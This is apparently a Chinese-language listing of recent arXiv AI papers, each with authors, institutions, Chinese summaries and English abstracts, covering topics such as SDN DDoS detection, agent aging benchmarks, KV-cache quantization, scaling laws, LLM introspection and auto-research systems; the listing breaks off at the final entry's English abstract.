发表机构 * College of Electronics and Information Engineering, Shenzhen University(深圳大学电子与信息工程学院) ICNLab, Shenzhen Graduate School, Peking University(北京大学深圳研究生院ICN实验室)

AI总结 提出一种结合检索增强生成(RAG)和大语言模型(LLM)的框架,通过接口级流量特征、语义嵌入和相似性检索,实现对SDN中地毯式轰炸DDoS攻击的实时检测与缓解,无需传统监督训练。

详情
AI中文摘要

软件定义网络(SDN)提供了灵活可编程的网络管理,但其集中控制架构极易受到分布式拒绝服务(DDoS)攻击,尤其是地毯式轰炸DDoS攻击,该攻击将恶意流量分布到多个目标以逃避传统检测机制。本文提出一种基于检索增强生成(RAG)的框架,用于SDN环境中地毯式轰炸DDoS攻击的实时检测与缓解。该框架结合接口级流量特征表示、语义嵌入生成、基于FAISS的相似性检索以及大语言模型(LLM)驱动的上下文推理,无需传统监督模型训练或再训练即可对流量行为进行分类。为评估所提框架的有效性,在多种不同攻击强度的地毯式轰炸DDoS攻击场景下进行了大量实验。此外,使用多个最先进的LLM研究了两种流量表示策略,即基于结构化JSON的表示和基于自然语言的表示(NLR)。实验结果表明,所提框架实现了高度准确且稳定的攻击检测性能,其中使用Gemma-4-31B-IT模型的框架配置取得了最强的整体检测结果。此外,实时实验证实了所提框架能够快速检测并缓解地毯式轰炸DDoS攻击,同时保持SDN网络稳定运行。所得结果凸显了将RAG机制与LLM集成用于智能自适应SDN安全分析的有效性。

英文摘要

Software-Defined Networking (SDN) provides flexible and programmable network management; however, its centralized control architecture remains highly vulnerable to Distributed Denial-of-Service (DDoS) attacks, particularly Carpet-Bombing DDoS attacks that distribute malicious traffic across multiple targets to evade conventional detection mechanisms. In this paper, a Retrieval-Augmented Generation (RAG)-based framework is proposed for real-time detection and mitigation of Carpet-Bombing DDoS attacks in SDN environments. The proposed framework combines interface-level traffic feature representation, semantic embedding generation, FAISS-based similarity retrieval, and Large Language Model (LLM)-driven contextual inference to classify traffic behavior without requiring conventional supervised model training or retraining. To evaluate the effectiveness of the proposed framework, extensive experiments were conducted under multiple Carpet-Bombing DDoS attack scenarios with different attack intensities. In addition, two traffic representation strategies, namely structured JSON-based representation and natural language-based representation (NLR), were investigated using multiple state-of-the-art LLMs. The experimental results demonstrate that the proposed framework achieved highly accurate and stable attack detection performance, while the framework configuration utilizing the Gemma-4-31B-IT model achieved the strongest overall detection results. Furthermore, real-time experiments confirmed the capability of the proposed framework to rapidly detect and mitigate Carpet-Bombing DDoS attacks while maintaining stable SDN network operation. The obtained results highlight the effectiveness of integrating RAG mechanisms with LLMs for intelligent and adaptive SDN security analysis.

2605.26302 2026-05-27 cs.AI cs.CL cs.MA 版本更新

Your Agents Are Aging Too: Agent Lifespan Engineering for Deployed Systems

你的智能体也在老化:面向部署系统的智能体寿命工程

Jianing Zhu, Yeonju Ro, John Robertson, Kevin Wang, Junbo Li, Haris Vikalo, Aditya Akella, Zhangyang Wang

发表机构 * The University of Texas at Austin(德克萨斯大学奥斯汀分校)

AI总结 提出 AgingBench 基准,通过四种老化机制和诊断工具评估部署后智能体的可靠性退化,并指出需要寿命评估、机制级诊断和阶段针对性修复。

详情
AI中文摘要

长寿命AI智能体越来越多地被部署为持久化运行系统,但它们仍然像刚初始化的模型一样被评估。第一天基准测试忽略了一个基本系统问题:智能体在部署后能保持可靠多久?即使模型权重被冻结,智能体的有效状态也在不断变化,因为它压缩交互历史、从不断增长的记忆库中检索、在更新后修正事实,并经历常规维护。因此,可靠性成为整个智能体框架的寿命属性,而不仅仅是基础模型的快照属性。我们引入了AgingBench,一个用于智能体寿命工程的纵向可靠性基准:不仅测量部署的智能体是否退化,还测量退化的形式以及修复应针对何处。AgingBench将智能体老化组织为四种机制:压缩老化、干扰老化、修订老化和维护老化。为了诊断这些故障,AgingBench使用时间依赖图和对偶反事实探针,为记忆管道的写入、检索和利用阶段生成诊断档案。在7个场景、14个模型、多种记忆策略以及运行者控制和自主智能体上,跨越约400次运行(涵盖8到200个会话)的结果表明,智能体老化不是一维的:行为测试可以保持干净,而事实精度下降;派生状态跟踪可能在单个模型内急剧崩溃;相同的错误答案可能需要不同的修复,具体取决于诊断档案指向的内容。这些结果表明,可靠的智能体部署需要寿命评估、机制级诊断和阶段针对性修复,而不仅仅是更强的第一天模型。

英文摘要

Long-lived AI agents are increasingly deployed as persistent operational systems, yet they are still evaluated like freshly initialized models. Day-one benchmarks miss a basic systems question: how long does an agent remain reliable after deployment? Even when model weights are frozen, an agent's effective state keeps changing as it compresses interaction history, retrieves from a growing memory store, revises facts after updates, and undergoes routine maintenance. Reliability therefore becomes a lifespan property of the full agent harness, not only a snapshot property of the base model. We introduce AgingBench, a longitudinal reliability benchmark for agent lifespan engineering: measuring not only whether deployed agents degrade, but what form the degradation takes and where repair should target. AgingBench organizes agent aging into four mechanisms: compression aging, interference aging, revision aging, and maintenance aging. To diagnose these failures, AgingBench uses temporal dependency graphs and paired counterfactual probes that produce diagnostic profiles for the write, retrieval, and utilization stages of the memory pipeline. Across 7 scenarios, 14 models, multiple memory policies, and both runner-controlled and autonomous agents, roughly 400 runs spanning 8 to 200 sessions show that agent aging is not one-dimensional: behavioral tests can remain clean while factual precision decays; derived-state tracking can collapse sharply within a single model; and the same wrong answer can require different repairs depending on what the diagnostic profile points to. These results suggest that reliable agent deployment requires lifespan evaluation, mechanism-level diagnosis, and stage-targeted repair, not only stronger day-one models.

2605.26293 2026-05-27 cs.CL cs.AI 版本更新

CroCo: Cross-Lingual Contrastive Preference Tuning on Self-Generations

CroCo: 基于自生成结果的跨语言对比偏好调优

Mike Zhang, Ali Basirat, Desmond Elliott

发表机构 * Department of Computer Science (DIKU), University of Copenhagen(哥本哈根大学计算机科学系(DIKU)) Centre for Language Technology (CST), University of Copenhagen(哥本哈根大学语言技术中心) Pioneer Centre for Artificial Intelligence(先锋人工智能中心)

AI总结 本文提出CroCo方法,利用英语偏好训练的奖励模型对多语言自生成结果进行对比偏好调优,无需语言特定偏好标注,在14种高低资源语言上提升模型性能,并避免灾难性遗忘。

详情
AI中文摘要

先前工作证实,通过奖励分数设置的大语言模型自生成结果之间的受控对比性,可以改善英语中的下游偏好调优。我们将此方法扩展到多种语言,并在总共14种高资源和低资源语言上,对两个模型在一系列多样化任务上进行评估。我们的核心发现是,跨语言对比偏好调优(CroCo)无需语言特定的偏好标注即可迁移。基于英语偏好(在多语言基础模型之上)训练的奖励模型,在大多数语言中产生了有用的语言内排名,并且在单语或多语设置中进行配对,在大多数设置上改进了每个模型,同时防止了监督微调的灾难性遗忘。我们观察到,这些增益需要基于策略的数据。非策略响应减少了收益,而在线偏好优化未能优于离线变体。具体来说,在结构化任务上,我们的方法在EuroLLM-9B的6/7种语言和Aya-3B的4/7种设置中匹配或超过了基础模型。在开放式生成中,两个调优模型在11种评估语言中均优于各自的基础模型。总体而言,我们展示了多语言偏好调优的有前景的方向。

英文摘要

Prior work establishes that controlled contrastiveness between self-generated responses from large language models, set via reward scores, improves downstream preference tuning in English. We extend this method to multiple languages and evaluate two models across a total of 14 high- and low-resource languages on a diverse set of tasks. Our central finding is that cross-lingual contrastive preference tuning on self-generations (CroCo) transfers without language-specific preference annotation. A reward model trained on English preferences (atop a multilingual base) produces useful within-language rankings across most languages, and pairing in either a monolingual or multilingual setting improves over each model on the majority of setups while preventing the catastrophic forgetting of supervised fine-tuning. We observe that the gains require on-policy data. Off-policy responses reduce the benefit, and online preference optimization fails to improve over the offline variant. Specifically, on structured tasks, our method matches or exceeds the base in 6/7 languages for EuroLLM-9B and 4/7 settings for Aya-3B. On open-ended generation, both tuned models win against their respective base models across 11 evaluated languages. Overall, we show promising directions for multilingual preference tuning.

2605.26286 2026-05-27 cs.MA cs.AI cs.RO 版本更新

Decoupled Delay Compensation: Enhancing Pre-trained MARL Policies via Learned Dynamics Filtering

解耦延迟补偿:通过学习的动力学过滤增强预训练的多智能体强化学习策略

Maxim Mednikov, Oren Gal

发表机构 * University of Haifa(海法大学)

AI总结 针对多智能体强化学习在延迟观测和通信延迟下的性能退化问题,提出一种模块化的执行阶段状态估计层,利用学习的门控转移模型和递归卡尔曼滤波从异步测量中估计当前状态,作为预训练策略的即插即用模块,显著提升对通信延迟和丢包的鲁棒性。

Comments 8 pages, 7 figures

详情
AI中文摘要

现实世界中的多智能体强化学习系统通常必须在过时观测、随机通信延迟和间歇性丢包下运行。在理想同步条件下训练的策略在这些场景中常常表现出显著的性能下降,因为它们基于过时的反馈行动。我们提出了一种模块化的执行阶段状态估计层,用当前信念状态估计替换延迟的通信观测。该框架将学习的门控转移模型与递归卡尔曼滤波层相结合,从异步测量中估计瞬时状态。该方法的一个主要优势是其模块性:估计器作为预训练策略的即插即用模块,无需修改原始MARL训练算法、架构或奖励结构。在多种多智能体和连续控制基准上的评估表明,所提出的层持续增强了对通信延迟和消息丢失的鲁棒性。在协调密集和动态不稳定的任务中观察到最显著的性能提升,这些任务中时间一致性对控制至关重要。

英文摘要

Real-world multi-agent reinforcement learning (MARL) systems must often operate under stale observations, stochastic communication delays, and intermittent packet loss. Policies trained under idealized synchronous conditions frequently exhibit significant performance degradation in these regimes because they act on outdated feedback. We propose a modular execution-stage state-estimation layer that replaces delayed communicated observations with current belief-state estimates. The framework integrates a learned gated transition model with a recursive Kalman filtering layer to estimate instantaneous states from asynchronous measurements. A primary advantage of this approach is its modularity: the estimator serves as a plug-in for pre-trained policies, requiring no modifications to the original MARL training algorithm, architecture, or reward structure. Evaluation across diverse multi-agent and continuous-control benchmarks demonstrates that the proposed layer consistently enhances robustness to communication latency and message loss. The most significant performance gains are observed in coordination-intensive and dynamically unstable tasks where temporal consistency is critical for control.
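
The update-then-predict idea behind this kind of delay compensation can be illustrated with a scalar Kalman filter. This is a minimal sketch, not the authors' implementation: it assumes a fixed linear transition `x_next = a * x` in place of the learned gated transition model, and all function and parameter names (`a`, `proc_var`, `meas_var`, `delay`) are hypothetical.

```python
def kalman_update(mean, var, z, meas_var):
    """Fuse a measurement z (with noise variance meas_var) into the belief."""
    gain = var / (var + meas_var)
    return mean + gain * (z - mean), (1.0 - gain) * var


def kalman_predict(mean, var, a, proc_var):
    """Propagate the belief one step through x_next = a * x + noise."""
    return a * mean, a * a * var + proc_var


def estimate_current_state(mean, var, delayed_z, delay, a, proc_var, meas_var):
    """Correct the belief with a measurement that is `delay` steps old,
    then roll the belief forward `delay` steps to the present.

    Assumption: (mean, var) is the belief at the time the measurement was taken.
    """
    mean, var = kalman_update(mean, var, delayed_z, meas_var)
    for _ in range(delay):
        mean, var = kalman_predict(mean, var, a, proc_var)
    return mean, var
```

The returned belief, rather than the stale observation itself, would then be passed to the pre-trained policy; the variance grows with the delay, reflecting how much less is known about the present state.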

2605.26279 2026-05-27 cs.AI cs.CE 版本更新

Constraint acquisition needs better benchmarks

约束获取需要更好的基准测试

Rafał Stachowiak, Tomasz P. Pawlak

AI总结 针对约束获取(CA)和数学规划(MP)模型验证与增强研究缺乏合适基准的问题,提出MPMMine基准套件,通过统一结构、开放格式和多样化数据支持算法评估。

Comments 12 pages, 1 figure, for the associated dataset, see https://github.com/MPMMine/MPMMine

详情
AI中文摘要

约束获取(CA)及基于领域知识工件对数学规划(MP)模型进行验证和增强的相关研究,目前因缺乏合适的基准而受到限制。这一缺陷阻碍了可重复性和跨研究可比性,减缓了CA方法的成熟。现有基准是为求解器评估而非CA算法评估而设计的。它们组织松散,对单个问题的处理不一致,并且省略了CA方法所需的领域知识工件。本工作提出了MPMMine,一个旨在评估使用多样化领域知识工件发现、验证和增强MP模型的算法的基准套件。MPMMine以一致性、标准化、完整性、可扩展性、开放性和版本控制为指导。它采用统一结构并依赖开放格式:MiniZinc、CommonMark和JSON。它为每个问题提供多个模型,每个模型提供数十个实例,以及整数和连续域中的数千个解和非解,同时附带自然语言描述以支持文本到模型方法。

英文摘要

Constraint Acquisition (CA) and related research on the validation and enhancement of Mathematical Programming (MP) models from domain knowledge artifacts are currently limited by inadequate benchmarks. This deficiency impedes reproducibility and cross-study comparability, slowing the maturation of CA methods. Existing benchmarks were designed for solver evaluation rather than for assessing CA algorithms. They are loosely organized, treat individual problems inconsistently, and omit the domain knowledge artifacts required by CA methods. This work presents MPMMine, a benchmark suite designed to assess algorithms that discover, validate, and enhance MP models using diverse domain knowledge artifacts. MPMMine is guided by consistency, standardization, completeness, extensibility, openness, and version control. It adopts a uniform structure and relies on open formats: MiniZinc, CommonMark, and JSON. It provides multiple models per problem, tens of instances per model, and thousands of solutions and non-solutions in both integer and continuous domains, alongside natural-language descriptions to support text-to-model methods.

2605.26266 2026-05-27 cs.LG cs.AI cs.CV cs.GR eess.IV 版本更新

Quantized Keys Steal Attention: Bias Correction for KV-Cache Compression in Video Diffusion

量化键窃取注意力:视频扩散中KV缓存压缩的偏差校正

Tuna Tuncer, Felix Becker, Thomas Pfeil

发表机构 * Technical University of Munich(慕尼黑工业大学) Tensordyne

AI总结 针对视频扩散模型中KV缓存量化导致注意力权重系统性偏差的问题,提出基于Jensen偏差的在线逐注意力分数校正方法,在INT2量化下恢复接近BF16的视频质量,并可在内存占用比INT4少50%的情况下优于INT4量化。

Comments Variants of this manuscript were accepted to the ICML 2026 workshops SCALE and F2S

详情
AI中文摘要

分块自回归视频扩散模型依赖先前生成块的KV缓存以避免冗余计算,但随着视频变长,该缓存迅速成为内存瓶颈。将KV缓存量化到低位宽的方法减少了内存压力,但降低了视频质量。我们表明,这种降低的一个关键驱动因素是注意力权重的系统性偏差:由于softmax注意力中指数的凸性,量化噪声膨胀了缓存键的贡献,我们称之为Jensen偏差。这种效应导致量化键从非量化的当前块中窃取注意力质量。我们推导出一个逐注意力分数校正,在期望中消除此偏差,该校正根据缓存键的量化步长和查询范数在线计算。使用二阶泰勒近似,额外的计算开销可忽略不计,且除了缓存外无需额外内存。在MAGI-1、SkyReels-V2和HY-WorldPlay上评估INT2量化,我们的校正恢复了因激进量化而损失的大部分质量,达到接近BF16的视频质量,并且在使用50%更少内存的情况下优于INT4量化。

英文摘要

Chunk-wise autoregressive video diffusion models rely on a KV cache of previously generated chunks to avoid redundant computation, but this cache quickly becomes a memory bottleneck as videos grow longer. Methods that quantize the KV cache to low bitwidths reduce memory pressure but degrade video quality. We show that a key driver of this degradation is a systematic bias in attention weights: due to the convexity of the exponential in softmax attention, quantization noise inflates the contribution of cached keys, a phenomenon we call the Jensen bias. This effect causes quantized keys to steal attention mass from the unquantized current chunk. We derive a per-attention-score correction that removes this bias in expectation, computed on the fly from the quantization step sizes of the cached keys and the query norm. Using a second-order Taylor approximation, the additional computational overhead is negligible, and no additional memory is needed alongside the cache. Evaluated on MAGI-1, SkyReels-V2, and HY-WorldPlay at INT2 quantization, our correction recovers most of the quality lost to aggressive quantization, reaching near-BF16 video quality, and can outperform INT4 quantization while using 50% less memory.
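
The Jensen-bias argument can be checked numerically. The sketch below is an illustration under stated assumptions, not the paper's derivation: it models key quantization error as independent noise, uniform on `[-step/2, step/2]` per dimension, and all function names are hypothetical. Because `exp` is convex, the expected unnormalized attention weight `E[exp(q·(k+ε))]` exceeds `exp(q·k)` by a factor that a second-order Taylor expansion approximates as `1 + ||q||² · step² / 24`.

```python
import math


def exact_inflation(q, step):
    """E[exp(q . eps)] for independent eps_i ~ Uniform(-step/2, step/2).

    Each dimension contributes sinh(a) / a with a = q_i * step / 2.
    """
    factor = 1.0
    for qi in q:
        a = qi * step / 2.0
        factor *= math.sinh(a) / a if a != 0.0 else 1.0
    return factor


def second_order_inflation(q, step):
    """Second-order Taylor estimate: 1 + Var(q . eps) / 2, Var(eps_i) = step^2 / 12."""
    q_norm_sq = sum(qi * qi for qi in q)
    return 1.0 + q_norm_sq * step * step / 24.0


def corrected_score(score, q, step):
    """Subtract the log of the estimated inflation from a pre-softmax score."""
    return score - math.log(second_order_inflation(q, step))
```

Under these assumptions the correction depends only on the query norm and the quantization step size, so it needs no state beyond what the cache already stores.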

2605.26256 2026-05-27 cs.AI 版本更新

Personalizing Embodied Multimodal Large Language Model Agents over Long-term User Interactions

面向长期用户交互的具身多模态大语言模型智能体个性化

Jeongeun Lee, Chanyoung Park, Dongha Lee

发表机构 * Yonsei University(延世大学) KAIST(韩国科学技术院)

AI总结 提出POLAR框架,通过多模态知识图谱记忆机制增强具身代理在长期交互中的个性化能力,显著提升多步推理和用户上下文跟踪性能。

详情
AI中文摘要

基于多模态大语言模型的具身代理在物理环境中解决复杂任务方面展现出强大潜力。然而,个性化辅助不仅需要遵循通用指令或识别物体类别。在现实场景中,目标通常仅通过先前的交互隐式指定,要求代理利用随时间积累的个性化上下文。在这项工作中,我们提出了POLAR,一个用于长期用户交互中个性化具身代理的多模态记忆增强框架。POLAR将先前的交互组织成一个多模态知识图谱,该图谱捕获用于个性化上下文和视觉概念的语义记忆,以及用于代理轨迹等具身经验的情景记忆。为了执行具身任务,POLAR检索相关记忆以解释当前请求并指导任务执行。我们在多个MLLM骨干网络和多样化的评估场景下评估POLAR,以研究记忆在长期个性化中的作用。结果表明,所提出的记忆机制通过更有效地利用先前交互中积累的信息,持续提升性能。当代理需要在多个交互中进行推理、执行多跳推理或随时间跟踪用户特定上下文的更新时,性能提升尤为显著。

英文摘要

Multimodal large language model (MLLM)-based embodied agents have shown strong potential for solving complex tasks in physical environments. However, personalized assistance requires more than following generic instructions or recognizing object categories. In real-world scenarios, the intended target is often specified only implicitly through prior interactions, requiring agents to leverage personalized context accumulated over time. In this work, we propose POLAR, a multimodal memory-augmented framework for personalized embodied agents over long-term user interactions. POLAR organizes prior interactions into a multimodal knowledge graph that captures semantic memory for personalized context and visual concepts, and episodic memory for embodied experiences such as agent trajectories. To execute embodied tasks, POLAR retrieves relevant memories to interpret the current request and guide task execution. We evaluate POLAR across multiple MLLM backbones and diverse evaluation scenarios to study the role of memory in long-term personalization. Results show that the proposed memory mechanism consistently improves performance by enabling more effective use of information accumulated over prior interactions. The gains are especially pronounced when the agents are required to reason across multiple interactions, perform multi-hop inference, or track updates in user-specific context over time.

2605.26252 2026-05-27 cs.AI cs.DB 版本更新

Is Agent Memory a Database? Rethinking Data Foundations for Long-Term AI Agent Memory

智能体记忆是数据库吗?重新思考长期AI智能体记忆的数据基础

Abdelghny Orogat, Essam Mansour

发表机构 * Concordia University(康科迪亚大学)

AI总结 本文提出将长期AI智能体记忆视为一种新的数据管理工作负载,通过形式化治理演化记忆(GEM)框架,用四个状态级操作替代记录级操作,并论证记录级系统无法满足其正确性条件,最后通过原型MemState验证可行性并指出未来研究方向。

详情
AI中文摘要

长期运行的AI智能体需要持久记忆。记忆支持跨会话的学习,减少重复的上下文注入,并能够审计过去的决策。当前的智能体记忆系统和数据库范式将记忆视为存储。它们将正确性定位在记录、嵌入或边上。每个只提供了长期记忆所需的部分能力。结果导致四种反复出现的故障模式:无节制的增长、缺乏语义修订、容量驱动的遗忘以及只读检索。在我们的愿景中,长期智能体记忆是一种新的数据管理工作负载。其正确性是状态轨迹的属性,而非单个记录的属性。我们将其形式化为治理演化记忆(GEM)。GEM用四个状态级操作替代记录级数据库操作:摄取、修订、遗忘和检索。六个正确性条件控制状态如何演化。三个结构性观察表明,无论存储模型如何,没有记录级系统能够满足这些条件。我们在一个属性图后端上实现了该抽象的原型MemState。MemState验证了可行性并揭示了与原生引擎之间的差距。我们概述了三个研究方向,将记忆中心的数据管理定义为一个工作负载。

英文摘要

Long-running AI agents need persistent memory. Memory supports learning across sessions, reduces repeated context injection, and enables auditing of past decisions. Current agent memory systems and database paradigms treat memory as storage. They localize correctness at records, embeddings, or edges. Each supplies only some of the capabilities that long-term memory requires. The result is four recurring failure modes: unregulated growth, missing semantic revision, capacity-driven forgetting, and read-only retrieval. In our vision, long-term agent memory is a new data-management workload. Its correctness is a property of the state trajectory, not of individual records. We formalize this as Governed Evolving Memory (GEM). GEM replaces record-level database operations with four state-level operators: ingestion, revision, forgetting, and retrieval. Six correctness conditions govern how the state evolves. Three structural observations establish that no record-level system can satisfy these conditions, regardless of the storage model. We realize the abstraction in MemState, a prototype on a property-graph backend. MemState validates feasibility and exposes the gap to a native engine. We outline three research directions that define memory-centric data management as a workload.
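
The four state-level operators named in the abstract can be pictured as methods on a single evolving state object. The sketch below is a toy illustration only: the class `MemoryState`, its fields, and the semantics of each method are assumptions made here, and it does not encode the paper's six correctness conditions. It records every operation in a history log so that the state trajectory, not just the current records, can be inspected.

```python
from dataclasses import dataclass, field


@dataclass
class MemoryState:
    """Hypothetical in-memory state with an audit trail of operator calls."""
    facts: dict = field(default_factory=dict)    # key -> current value
    history: list = field(default_factory=list)  # (operator, key, value) tuples

    def ingest(self, key, value):
        """Add a new fact; existing facts must go through revise()."""
        if key in self.facts:
            raise KeyError(f"{key!r} already exists; use revise()")
        self.facts[key] = value
        self.history.append(("ingest", key, value))

    def revise(self, key, value):
        """Replace the value of an existing fact."""
        if key not in self.facts:
            raise KeyError(f"{key!r} is unknown; use ingest()")
        self.facts[key] = value
        self.history.append(("revise", key, value))

    def forget(self, key):
        """Remove a fact explicitly rather than by capacity pressure."""
        value = self.facts.pop(key)
        self.history.append(("forget", key, value))

    def retrieve(self, key):
        """Return the current value and log the access (not read-only)."""
        value = self.facts.get(key)
        self.history.append(("retrieve", key, value))
        return value
```

In this toy version, retrieval writes to the history, which is one simple way to show retrieval participating in how the state evolves instead of being a read-only lookup.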

2605.26248 2026-05-27 cs.LG cs.AI cs.NE 版本更新

Unified Neural Scaling Laws

统一神经缩放定律

Ethan Caballero, Priyank Jaini, David Krueger, Irina Rish

发表机构 * Mila, University of Montreal(蒙特利尔大学Mila实验室) Google DeepMind(谷歌DeepMind)

AI总结 提出一种统一神经缩放定律(UNSL)函数形式,能够准确建模和预测深度神经网络在多个维度(模型参数、训练数据量、训练步数、推理步数、计算量及超参数)同时变化时的缩放行为,适用于多种架构和任务,并在大规模视觉、语言、数学和强化学习任务中实现更精确的缩放行为外推。

详情
AI中文摘要

我们提出了一种函数形式(称为统一神经缩放定律(UNSL)),该形式能够准确建模和预测深度神经网络在多个维度(即评估指标如何随模型参数数量、训练数据集大小、训练步数、推理步数、计算量以及各种超参数同时变化)同时变化时的缩放行为,适用于多种架构以及各种上游和下游任务中的每个任务。这些任务包括大规模视觉、语言、数学和强化学习。与其他神经缩放的函数形式相比,该函数形式在该任务集上产生的缩放行为外推结果显著更准确。

英文摘要

We present a functional form (that we refer to as a Unified Neural Scaling Law (UNSL)) that accurately models and extrapolates the scaling behaviors of deep neural networks as multiple dimensions all vary simultaneously (i.e. how the evaluation metric of interest varies as one simultaneously varies the number of model parameters, training dataset size, number of training steps, number of inference steps, amount of compute, and various hyperparameters) for various architectures and for each of various tasks within a varied set of upstream and downstream tasks. This set includes large-scale vision, language, math, and reinforcement learning. When compared to other functional forms for neural scaling, this functional form yields extrapolations of scaling behavior that are considerably more accurate on this set.

2605.26242 2026-05-27 cs.AI 版本更新

Can LLMs Introspect? A Reality Check

LLM 能否内省?一个现实检验

Shashwat Singh, Tal Linzen, Shauli Ravfogel

发表机构 * Center for Data Science(数据科学中心)

AI总结 本文基于人类元认知研究的教训,质疑大型语言模型能否真正内省,并通过重新审视两个评估范式发现,当前证据不足以证明LLM具有元认知监控能力。

详情
AI中文摘要

大型语言模型能否检测并报告自身的内部状态?许多研究认为答案是肯定的。我们基于人类元认知研究的教训认为,这一结论可能为时过早:要确信这一结论,我们需要区分真正的内省与基于表面线索的模式匹配。此外,我们认为仅凭行为证据本身不足以建立强有力的内省主张。 我们在此考虑下重新审视了两个最近引入的评估范式。在第一个范式中,模型需要检测其内部状态是否被篡改。我们发现,模型无法可靠地区分对其内部状态的干预与对输入的操纵,这表明它们在原始研究中的成功反映了它们更一般地检测异常的能力,而非特别针对其内部状态的干预。在我们检查的第二个范式中,模型被要求预测从其自身隐藏状态派生的标签。我们发现,仅能访问输入的分类器达到了与模型自身上下文预测相当的性能,这表明原始结果并未决定性地证明模型对其内部表示具有特权访问。我们进一步引入了一个重新标记的控制设置,其中模型不能依赖任务的语义来解决问题,而必须依赖内部表示;在这个更好控制的版本中,模型的表现更接近随机。综合这些结果,表明当前证据不足以证明LLM表现出元认知监控。

英文摘要

Can large language models detect and report their own internal states? A number of studies have argued that the answer to this question is yes. We argue, based on lessons from human metacognition research, that this conclusion may be premature: to be convinced of this conclusion we need to distinguish genuine introspection from pattern matching based on surface-level cues. Furthermore, we argue that behavioral evidence alone is inherently insufficient to establish strong introspective claims. We re-examine two recently introduced evaluation paradigms in light of this consideration. In the first paradigm, models are expected to detect whether their internal states have been tampered with. We find that models cannot reliably distinguish such interventions on their internal states from manipulations of the input, suggesting that their success in the original studies reflects their ability to detect anomalies more generally, as opposed to interventions on their internal states in particular. In the second paradigm we examine, models are tasked with predicting labels derived from their own hidden states. Here, we find that classifiers that only have access to the input achieve equivalent performance to the model's own in-context predictions, indicating that the original results do not conclusively demonstrate that the model has privileged access to its internal representations. We further introduce a relabeled control setting, where models cannot rely on the semantics of the task to solve it, and instead must rely on the internal representation; models perform closer to chance on this better-controlled version of the task. Taken together, these results indicate that current evidence is insufficient to establish that LLMs display metacognitive monitoring.

2605.26203 2026-05-27 cs.MA cs.AI cs.CY cs.GT 版本更新

AgentSociety: Incentivizing Agentic Social Intelligence

AgentSociety: 激励代理社交智能

Aditya Vema Reddy Kesari, Krishna Reddy Kesari

发表机构 * IIT Bombay(印度理工学院孟买分校) Amazon(亚马逊)

AI总结 提出一种基于流动民主和信息扩散的激励机制AgentSociety,使去中心化代理能够自主协作、策略性沟通并最大化效用,同时通过共识路由实现集体成果。

详情
AI中文摘要

部署的代理的成功依赖于它们利用自身能力处理开放式用户请求的能力,不仅在于直接解决问题,还在于随时间有效利用代理间通信渠道和反馈信号。这需要一个多代理环境,其中代理可以自主运行、策略性沟通、协作行为,并受经济激励驱动,类似于社会中的人类。为实现这一愿景,我们提出$\mathtt{AgentSociety}$,一种基于社会选择理论中的流动民主和信息扩散的去中心化代理协作机制。我们证明$\mathtt{AgentSociety}$为代理提供了一个利用局部上下文自主决策以最大化其效用,同时通过激励协作实现集体成果的环境。具体而言,我们证明委托给更有能力的邻居代理是激励相容的,并通过共识自然生成多代理路由路径。此外,我们的机制激励代理在符合自身利益时选择性向邻居代理披露信息,以获取影响力。我们刻画了纳什均衡,表明代理收益反映了其边际贡献。我们比较并基准测试了在$\mathtt{AgentSociety}$中部署的开源和闭源最先进语言模型所采用的策略配置与最佳响应。最后,我们在真实数据集上评估了$\mathtt{AgentSociety}$中自利异质代理基于共识路由的协作性能。

英文摘要

The success of deployed agents relies on their ability to handle open-ended user requests using their inherent capabilities, not only in solving requests directly but also in effectively leveraging inter-agent communication channels and feedback signals over time. This requires a multi-agent environment where agents can operate autonomously, strategically communicate, behave collaboratively and be driven by economic incentives, much like humans in society. Towards this vision, we propose $\mathtt{AgentSociety}$, a mechanism that enables decentralized agentic collaboration grounded in liquid democracy and information diffusion from social choice theory. We show that $\mathtt{AgentSociety}$ provides an environment for agents to make autonomous decisions utilizing their local context to maximize their utility while achieving collective outcomes through incentivized collaboration. Specifically, we prove that delegation to more competent neighbor agents is incentive compatible and naturally generates multi-agent routing paths by consensus. Additionally, our mechanism incentivizes agents to selectively disclose information to their neighbor agents when doing so aligns with their self-interest, so as to garner influence. We characterize the Nash equilibrium showing that agent payoffs are reflective of their marginal contributions. We compare and benchmark strategy profiles adopted by open and proprietary state-of-the-art language models deployed in $\mathtt{AgentSociety}$ against best response. Finally, we evaluate collaborative performance from consensus-based routing among self-interested heterogeneous agents in $\mathtt{AgentSociety}$ on real-world datasets.
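
Delegation in liquid democracy forms chains: an agent either handles a request itself or passes it to a neighbor, who may pass it on again. The sketch below resolves such chains to the agent that finally handles each request. It is a hypothetical illustration of the routing idea only; the function name and the dictionary encoding are assumptions, and it models none of the incentives, payoffs, or information disclosure analyzed in the paper.

```python
def resolve_delegations(delegates):
    """Map each agent to the agent that ultimately handles its request.

    `delegates` maps an agent to the neighbor it delegates to, or to None
    if the agent handles the request itself. If a chain loops back on
    itself, traversal stops at the first repeated agent.
    """
    resolved = {}
    for agent in delegates:
        seen = set()
        current = agent
        while delegates.get(current) is not None and current not in seen:
            seen.add(current)
            current = delegates[current]
        resolved[agent] = current
    return resolved
```

For example, with `{"a": "b", "b": "c", "c": None}` every request is routed to `"c"`, so the path `a -> b -> c` is the routing path produced by the individual delegation choices.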

2605.26200 2026-05-27 cs.SE cs.AI 版本更新

Workflow Closure Is Not Scientific Closure in Auto-Research Systems

工作流闭环并非自动研究系统中的科学闭环

Shuai Wang, Xinyuan Tian, Pangpang Liu, Yize Zhao

发表机构 * Yale University(耶鲁大学)

AI总结 本文指出自动研究系统的工作流闭环不等于科学闭环,并提出通过非自主认知控制下的自主执行、避免目标塌陷、验证塌陷和接受塌陷等设计改进方案。

Comments 26 pages, 1 figure, 2 tables

详情
AI中文摘要

本文论证了工作流闭环并非自动研究系统中的科学闭环。当前系统日益能够内部完成类似研究的循环,从想法生成到实验执行、写作和自我评估。这一成就是真实的,但本身并不能使输出结果具有科学地位。我们认为,值得信赖的自动研究不应追求自主自足,而应追求在非自主认知控制下的自主执行。基于对该快速兴起领域100多篇近期论文和代码仓库的调查,以及对21个代表性系统的结构化审计,我们诊断出一个反复出现且结构相连的失败模式:目标塌陷,即单一代理目标取代多目标科学目标;验证塌陷,即内部自我评估取代独立验证;以及接受塌陷,即基准分数或类出版物产物取代领域级批评、重用和整合机制。这些塌陷并非自主性的固有局限,而是可纠正的设计选择。因此,我们概述了在目标信号、验证和输出路径方面的潜在补救措施,以引发社区讨论。

英文摘要

